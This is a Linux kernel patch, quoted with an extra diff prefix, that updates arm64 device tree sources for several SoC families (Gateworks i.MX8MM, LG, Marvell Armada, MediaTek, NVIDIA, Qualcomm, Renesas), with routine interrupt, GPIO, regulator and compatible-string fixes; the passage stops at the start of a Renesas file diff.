+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi
+index c557dbf4dcd60..2e90466db89a0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi
+@@ -47,17 +47,6 @@ pps {
+ 		gpios = <&gpio1 15 GPIO_ACTIVE_HIGH>;
+ 		status = "okay";
+ 	};
+-
+-	reg_usb_otg1_vbus: regulator-usb-otg1 {
+-		pinctrl-names = "default";
+-		pinctrl-0 = <&pinctrl_reg_usb1_en>;
+-		compatible = "regulator-fixed";
+-		regulator-name = "usb_otg1_vbus";
+-		gpio = <&gpio1 10 GPIO_ACTIVE_HIGH>;
+-		enable-active-high;
+-		regulator-min-microvolt = <5000000>;
+-		regulator-max-microvolt = <5000000>;
+-	};
+ };
+ 
+ /* off-board header */
+@@ -146,9 +135,10 @@ &uart3 {
+ };
+ 
+ &usbotg1 {
++	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	dr_mode = "otg";
+ 	over-current-active-low;
+-	vbus-supply = <&reg_usb_otg1_vbus>;
+ 	status = "okay";
+ };
+ 
+@@ -206,14 +196,6 @@ MX8MM_IOMUXC_GPIO1_IO15_GPIO1_IO15	0x41
+ 		>;
+ 	};
+ 
+-	pinctrl_reg_usb1_en: regusb1grp {
+-		fsl,pins = <
+-			MX8MM_IOMUXC_GPIO1_IO10_GPIO1_IO10	0x41
+-			MX8MM_IOMUXC_GPIO1_IO12_GPIO1_IO12	0x141
+-			MX8MM_IOMUXC_GPIO1_IO13_USB1_OTG_OC	0x41
+-		>;
+-	};
+-
+ 	pinctrl_spi2: spi2grp {
+ 		fsl,pins = <
+ 			MX8MM_IOMUXC_ECSPI2_SCLK_ECSPI2_SCLK	0xd6
+@@ -236,4 +218,11 @@ MX8MM_IOMUXC_UART3_RXD_UART3_DCE_RX	0x140
+ 			MX8MM_IOMUXC_UART3_TXD_UART3_DCE_TX	0x140
+ 		>;
+ 	};
++
++	pinctrl_usbotg1: usbotg1grp {
++		fsl,pins = <
++			MX8MM_IOMUXC_GPIO1_IO12_GPIO1_IO12	0x141
++			MX8MM_IOMUXC_GPIO1_IO13_USB1_OTG_OC	0x41
++		>;
++	};
+ };
+diff --git a/arch/arm64/boot/dts/lg/lg1312.dtsi b/arch/arm64/boot/dts/lg/lg1312.dtsi
+index 78ae73d0cf365..98ff17b14b2a5 100644
+--- a/arch/arm64/boot/dts/lg/lg1312.dtsi
++++ b/arch/arm64/boot/dts/lg/lg1312.dtsi
+@@ -124,7 +124,6 @@ eth0: ethernet@c1b00000 {
+ 	amba {
+ 		#address-cells = <2>;
+ 		#size-cells = <1>;
+-		#interrupt-cells = <3>;
+ 
+ 		compatible = "simple-bus";
+ 		interrupt-parent = <&gic>;
+diff --git a/arch/arm64/boot/dts/lg/lg1313.dtsi b/arch/arm64/boot/dts/lg/lg1313.dtsi
+index 2173316573bee..8e9410d8f46c0 100644
+--- a/arch/arm64/boot/dts/lg/lg1313.dtsi
++++ b/arch/arm64/boot/dts/lg/lg1313.dtsi
+@@ -124,7 +124,6 @@ eth0: ethernet@c3700000 {
+ 	amba {
+ 		#address-cells = <2>;
+ 		#size-cells = <1>;
+-		#interrupt-cells = <3>;
+ 
+ 		compatible = "simple-bus";
+ 		interrupt-parent = <&gic>;
+diff --git a/arch/arm64/boot/dts/marvell/armada-37xx.dtsi b/arch/arm64/boot/dts/marvell/armada-37xx.dtsi
+index df152c72276b8..cd28e1c45b70a 100644
+--- a/arch/arm64/boot/dts/marvell/armada-37xx.dtsi
++++ b/arch/arm64/boot/dts/marvell/armada-37xx.dtsi
+@@ -426,14 +426,14 @@ xor11 {
+ 			crypto: crypto@90000 {
+ 				compatible = "inside-secure,safexcel-eip97ies";
+ 				reg = <0x90000 0x20000>;
+-				interrupts = <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>,
+-					     <GIC_SPI 20 IRQ_TYPE_LEVEL_HIGH>,
++				interrupts = <GIC_SPI 20 IRQ_TYPE_LEVEL_HIGH>,
+ 					     <GIC_SPI 21 IRQ_TYPE_LEVEL_HIGH>,
+ 					     <GIC_SPI 22 IRQ_TYPE_LEVEL_HIGH>,
+ 					     <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH>,
+-					     <GIC_SPI 24 IRQ_TYPE_LEVEL_HIGH>;
+-				interrupt-names = "mem", "ring0", "ring1",
+-						  "ring2", "ring3", "eip";
++					     <GIC_SPI 24 IRQ_TYPE_LEVEL_HIGH>,
++					     <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>;
++				interrupt-names = "ring0", "ring1", "ring2",
++						  "ring3", "eip", "mem";
+ 				clocks = <&nb_periph_clk 15>;
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi b/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi
+index a06a0a889c43f..73d8803b54d8b 100644
+--- a/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi
++++ b/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi
+@@ -133,7 +133,6 @@ pmu {
+ 
+ 			odmi: odmi@300000 {
+ 				compatible = "marvell,odmi-controller";
+-				interrupt-controller;
+ 				msi-controller;
+ 				marvell,odmi-frames = <4>;
+ 				reg = <0x300000 0x4000>,
+diff --git a/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi b/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi
+index d6c0990a267d9..218c059b16d9c 100644
+--- a/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi
++++ b/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi
+@@ -506,14 +506,14 @@ CP11X_LABEL(sdhci0): mmc@780000 {
+ 		CP11X_LABEL(crypto): crypto@800000 {
+ 			compatible = "inside-secure,safexcel-eip197b";
+ 			reg = <0x800000 0x200000>;
+-			interrupts = <87 IRQ_TYPE_LEVEL_HIGH>,
+-				<88 IRQ_TYPE_LEVEL_HIGH>,
++			interrupts = <88 IRQ_TYPE_LEVEL_HIGH>,
+ 				<89 IRQ_TYPE_LEVEL_HIGH>,
+ 				<90 IRQ_TYPE_LEVEL_HIGH>,
+ 				<91 IRQ_TYPE_LEVEL_HIGH>,
+-				<92 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "mem", "ring0", "ring1",
+-				"ring2", "ring3", "eip";
++				<92 IRQ_TYPE_LEVEL_HIGH>,
++				<87 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "ring0", "ring1", "ring2", "ring3",
++					  "eip", "mem";
+ 			clock-names = "core", "reg";
+ 			clocks = <&CP11X_LABEL(clk) 1 26>,
+ 				 <&CP11X_LABEL(clk) 1 17>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+index 2c35ed0734a47..b1ddc491d2936 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+@@ -74,6 +74,7 @@ led-1 {
+ 
+ 	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x40000000>;
++		device_type = "memory";
+ 	};
+ 
+ 	reg_1p8v: regulator-1p8v {
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+index f9313b697ac12..527dcb279ba52 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+@@ -56,6 +56,7 @@ key-wps {
+ 
+ 	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x20000000>;
++		device_type = "memory";
+ 	};
+ 
+ 	reg_1p8v: regulator-1p8v {
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index fc338bd497f51..108931e796465 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -110,6 +110,7 @@ infracfg: infracfg@10001000 {
+ 			compatible = "mediatek,mt7986-infracfg", "syscon";
+ 			reg = <0 0x10001000 0 0x1000>;
+ 			#clock-cells = <1>;
++			#reset-cells = <1>;
+ 		};
+ 
+ 		wed_pcie: wed-pcie@10003000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+index dccf367c7ec6c..3d95625f1b0b4 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+@@ -4,6 +4,8 @@
+  */
+ 
+ #include "mt8183-kukui.dtsi"
++/* Must come after mt8183-kukui.dtsi to modify cros_ec */
++#include <arm/cros-ec-keyboard.dtsi>
+ 
+ / {
+ 	panel: panel {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi
+index 50a0dd36b5fb3..0d3c7b8162ff0 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi
+@@ -372,6 +372,16 @@ pen_eject {
+ 	};
+ };
+ 
++&cros_ec {
++	cbas {
++		compatible = "google,cros-cbas";
++	};
++
++	keyboard-controller {
++		compatible = "google,cros-ec-keyb-switches";
++	};
++};
++
+ &qca_wifi {
+ 	qcom,ath10k-calibration-variant = "GO_KAKADU";
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi
+index 06f8c80bf5536..e73113cb51f53 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi
+@@ -339,6 +339,16 @@ touch_pin_reset: pin_reset {
+ 	};
+ };
+ 
++&cros_ec {
++	cbas {
++		compatible = "google,cros-cbas";
++	};
++
++	keyboard-controller {
++		compatible = "google,cros-ec-keyb-switches";
++	};
++};
++
+ &qca_wifi {
+ 	qcom,ath10k-calibration-variant = "GO_KODAMA";
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi
+index a7b0cb3ff7b0a..181da69d18f46 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi
+@@ -343,6 +343,16 @@ rst_pin {
+ 	};
+ };
+ 
++&cros_ec {
++	cbas {
++		compatible = "google,cros-cbas";
++	};
++
++	keyboard-controller {
++		compatible = "google,cros-ec-keyb-switches";
++	};
++};
++
+ &qca_wifi {
+ 	qcom,ath10k-calibration-variant = "LE_Krane";
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index a428a581c93a8..1db97d94658b9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -896,10 +896,6 @@ usbc_extcon: extcon0 {
+ 			google,usb-port-id = <0>;
+ 		};
+ 
+-		cbas {
+-			compatible = "google,cros-cbas";
+-		};
+-
+ 		typec {
+ 			compatible = "google,cros-ec-typec";
+ 			#address-cells = <1>;
+@@ -999,5 +995,4 @@ hub@1 {
+ 	};
+ };
+ 
+-#include <arm/cros-ec-keyboard.dtsi>
+ #include <arm/cros-ec-sbs.dtsi>
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index 50367da93cd79..c6080af1e4a30 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -819,10 +819,6 @@ cros_ec: ec@0 {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		base_detection: cbas {
+-			compatible = "google,cros-cbas";
+-		};
+-
+ 		cros_ec_pwm: pwm {
+ 			compatible = "google,cros-ec-pwm";
+ 			#pwm-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 2f40c6cc407c1..4ed8a0f187583 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -1539,7 +1539,7 @@ vcodec_enc: vcodec@17020000 {
+ 			mediatek,scp = <&scp>;
+ 			power-domains = <&spm MT8192_POWER_DOMAIN_VENC>;
+ 			clocks = <&vencsys CLK_VENC_SET1_VENC>;
+-			clock-names = "venc-set1";
++			clock-names = "venc_sel";
+ 			assigned-clocks = <&topckgen CLK_TOP_VENC_SEL>;
+ 			assigned-clock-parents = <&topckgen CLK_TOP_UNIVPLL_D4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts
+index 3348ba69ff6cf..d86d193e5a75e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts
+@@ -13,3 +13,7 @@ / {
+ &ts_10 {
+ 	status = "okay";
+ };
++
++&watchdog {
++	/delete-property/ mediatek,disable-extrst;
++};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts
+index 4669e9d917f8c..5356f53308e24 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts
+@@ -33,3 +33,7 @@ pins-low-power-pcie0-disable {
+ &ts_10 {
+ 	status = "okay";
+ };
++
++&watchdog {
++	/delete-property/ mediatek,disable-extrst;
++};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts
+index 5021edd02f7c1..fca3606cb951e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts
+@@ -34,3 +34,7 @@ pins-low-power-pcie0-disable {
+ &ts_10 {
+ 	status = "okay";
+ };
++
++&watchdog {
++	/delete-property/ mediatek,disable-extrst;
++};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+index 5117b2e7985af..998c2e78168a6 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+@@ -111,6 +111,7 @@ mt6360: pmic@34 {
+ 		compatible = "mediatek,mt6360";
+ 		reg = <0x34>;
+ 		interrupt-controller;
++		#interrupt-cells = <1>;
+ 		interrupts-extended = <&pio 101 IRQ_TYPE_EDGE_FALLING>;
+ 		interrupt-names = "IRQB";
+ 
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+index f094011be9ed9..8099dc04ed2e1 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+@@ -2024,7 +2024,7 @@ ethernet@6800000 {
+ 			status = "okay";
+ 
+ 			phy-handle = <&mgbe0_phy>;
+-			phy-mode = "usxgmii";
++			phy-mode = "10gbase-r";
+ 
+ 			mdio {
+ 				#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index 135ff4368c4a6..5c04c91b0ee2b 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -532,7 +532,7 @@ &mss_pil {
+ &pcie0 {
+ 	status = "okay";
+ 	perst-gpios = <&tlmm 35 GPIO_ACTIVE_LOW>;
+-	enable-gpio = <&tlmm 134 GPIO_ACTIVE_HIGH>;
++	wake-gpios = <&tlmm 134 GPIO_ACTIVE_HIGH>;
+ 
+ 	vddpe-3v3-supply = <&pcie0_3p3v_dual>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index eb1a9369926d2..9dccecd9fcaef 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1822,8 +1822,8 @@ pcie0: pci@1c00000 {
+ 			phys = <&pcie0_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 35 GPIO_ACTIVE_HIGH>;
+-			enable-gpio = <&tlmm 37 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 35 GPIO_ACTIVE_HIGH>;
++			wake-gpios = <&tlmm 37 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie0_default_state>;
+@@ -1925,7 +1925,7 @@ pcie1: pci@1c08000 {
+ 			phys = <&pcie1_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 102 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 102 GPIO_ACTIVE_HIGH>;
+ 			enable-gpio = <&tlmm 104 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+index ed9400f903c9e..b677ef6705d94 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+@@ -656,8 +656,8 @@ channel7 {
+ 
+ 		avb0: ethernet@e6800000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
+-			reg = <0 0xe6800000 0 0x800>;
++				     "renesas,etheravb-rcar-gen4";
++			reg = <0 0xe6800000 0 0x1000>;
+ 			interrupts = <GIC_SPI 256 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 257 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 258 IRQ_TYPE_LEVEL_HIGH>,
+@@ -704,8 +704,8 @@ avb0: ethernet@e6800000 {
+ 
+ 		avb1: ethernet@e6810000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
+-			reg = <0 0xe6810000 0 0x800>;
++				     "renesas,etheravb-rcar-gen4";
++			reg = <0 0xe6810000 0 0x1000>;
+ 			interrupts = <GIC_SPI 281 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 282 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 283 IRQ_TYPE_LEVEL_HIGH>,
+@@ -752,7 +752,7 @@ avb1: ethernet@e6810000 {
+ 
+ 		avb2: ethernet@e6820000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6820000 0 0x1000>;
+ 			interrupts = <GIC_SPI 306 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>,
+@@ -800,7 +800,7 @@ avb2: ethernet@e6820000 {
+ 
+ 		avb3: ethernet@e6830000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6830000 0 0x1000>;
+ 			interrupts = <GIC_SPI 331 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 332 IRQ_TYPE_LEVEL_HIGH>,
+@@ -848,7 +848,7 @@ avb3: ethernet@e6830000 {
+ 
+ 		avb4: ethernet@e6840000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6840000 0 0x1000>;
+ 			interrupts = <GIC_SPI 356 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 357 IRQ_TYPE_LEVEL_HIGH>,
+@@ -896,7 +896,7 @@ avb4: ethernet@e6840000 {
+ 
+ 		avb5: ethernet@e6850000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6850000 0 0x1000>;
+ 			interrupts = <GIC_SPI 381 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 382 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1019,7 +1019,7 @@ tpu: pwm@e6e80000 {
+ 
+ 		msiof0: spi@e6e90000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6e90000 0 0x0064>;
+ 			interrupts = <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 618>;
+@@ -1034,7 +1034,7 @@ msiof0: spi@e6e90000 {
+ 
+ 		msiof1: spi@e6ea0000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6ea0000 0 0x0064>;
+ 			interrupts = <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 619>;
+@@ -1049,7 +1049,7 @@ msiof1: spi@e6ea0000 {
+ 
+ 		msiof2: spi@e6c00000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c00000 0 0x0064>;
+ 			interrupts = <GIC_SPI 247 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 620>;
+@@ -1064,7 +1064,7 @@ msiof2: spi@e6c00000 {
+ 
+ 		msiof3: spi@e6c10000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c10000 0 0x0064>;
+ 			interrupts = <GIC_SPI 248 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 621>;
+@@ -1079,7 +1079,7 @@ msiof3: spi@e6c10000 {
+ 
+ 		msiof4: spi@e6c20000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c20000 0 0x0064>;
+ 			interrupts = <GIC_SPI 249 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 622>;
+@@ -1094,7 +1094,7 @@ msiof4: spi@e6c20000 {
+ 
+ 		msiof5: spi@e6c28000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c28000 0 0x0064>;
+ 			interrupts = <GIC_SPI 250 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 623>;
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+index d58b18802cb01..868d1a3cbdf61 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+@@ -337,7 +337,7 @@ hscif0: serial@e6540000 {
+ 		avb0: ethernet@e6800000 {
+ 			compatible = "renesas,etheravb-r8a779g0",
+ 				     "renesas,etheravb-rcar-gen4";
+-			reg = <0 0xe6800000 0 0x800>;
++			reg = <0 0xe6800000 0 0x1000>;
+ 			interrupts = <GIC_SPI 335 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 336 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 337 IRQ_TYPE_LEVEL_HIGH>,
+@@ -384,7 +384,7 @@ avb0: ethernet@e6800000 {
+ 		avb1: ethernet@e6810000 {
+ 			compatible = "renesas,etheravb-r8a779g0",
+ 				     "renesas,etheravb-rcar-gen4";
+-			reg = <0 0xe6810000 0 0x800>;
++			reg = <0 0xe6810000 0 0x1000>;
+ 			interrupts = <GIC_SPI 360 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 361 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 362 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+index a4738842f0646..7f88395ff7997 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
+ /*
+- * Device Tree Source for the RZ/G2UL SoC
++ * Device Tree Source for the RZ/Five and RZ/G2UL SoCs
+  *
+  * Copyright (C) 2022 Renesas Electronics Corp.
+  */
+@@ -68,36 +68,8 @@ opp-1000000000 {
+ 		};
+ 	};
+ 
+-	cpus {
+-		#address-cells = <1>;
+-		#size-cells = <0>;
+-
+-		cpu0: cpu@0 {
+-			compatible = "arm,cortex-a55";
+-			reg = <0>;
+-			device_type = "cpu";
+-			#cooling-cells = <2>;
+-			next-level-cache = <&L3_CA55>;
+-			enable-method = "psci";
+-			clocks = <&cpg CPG_CORE R9A07G043_CLK_I>;
+-			operating-points-v2 = <&cluster0_opp>;
+-		};
+-
+-		L3_CA55: cache-controller-0 {
+-			compatible = "cache";
+-			cache-unified;
+-			cache-size = <0x40000>;
+-		};
+-	};
+-
+-	psci {
+-		compatible = "arm,psci-1.0", "arm,psci-0.2";
+-		method = "smc";
+-	};
+-
+ 	soc: soc {
+ 		compatible = "simple-bus";
+-		interrupt-parent = <&gic>;
+ 		#address-cells = <2>;
+ 		#size-cells = <2>;
+ 		ranges;
+@@ -545,12 +517,6 @@ cpg: clock-controller@11010000 {
+ 		sysc: system-controller@11020000 {
+ 			compatible = "renesas,r9a07g043-sysc";
+ 			reg = <0 0x11020000 0 0x10000>;
+-			interrupts = <SOC_PERIPHERAL_IRQ(42) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(43) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(44) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(45) IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "lpm_int", "ca55stbydone_int",
+-					  "cm33stbyr_int", "ca55_deny";
+ 			status = "disabled";
+ 		};
+ 
+@@ -603,16 +569,6 @@ dmac: dma-controller@11820000 {
+ 			dma-channels = <16>;
+ 		};
+ 
+-		gic: interrupt-controller@11900000 {
+-			compatible = "arm,gic-v3";
+-			#interrupt-cells = <3>;
+-			#address-cells = <0>;
+-			interrupt-controller;
+-			reg = <0x0 0x11900000 0 0x40000>,
+-			      <0x0 0x11940000 0 0x60000>;
+-			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_LOW>;
+-		};
+-
+ 		sdhi0: mmc@11c00000 {
+ 			compatible = "renesas,sdhi-r9a07g043",
+ 				     "renesas,rcar-gen3-sdhi";
+@@ -893,12 +849,4 @@ target: trip-point {
+ 			};
+ 		};
+ 	};
+-
+-	timer {
+-		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+index 96f935bc2d4d1..011d4c88f4ed9 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
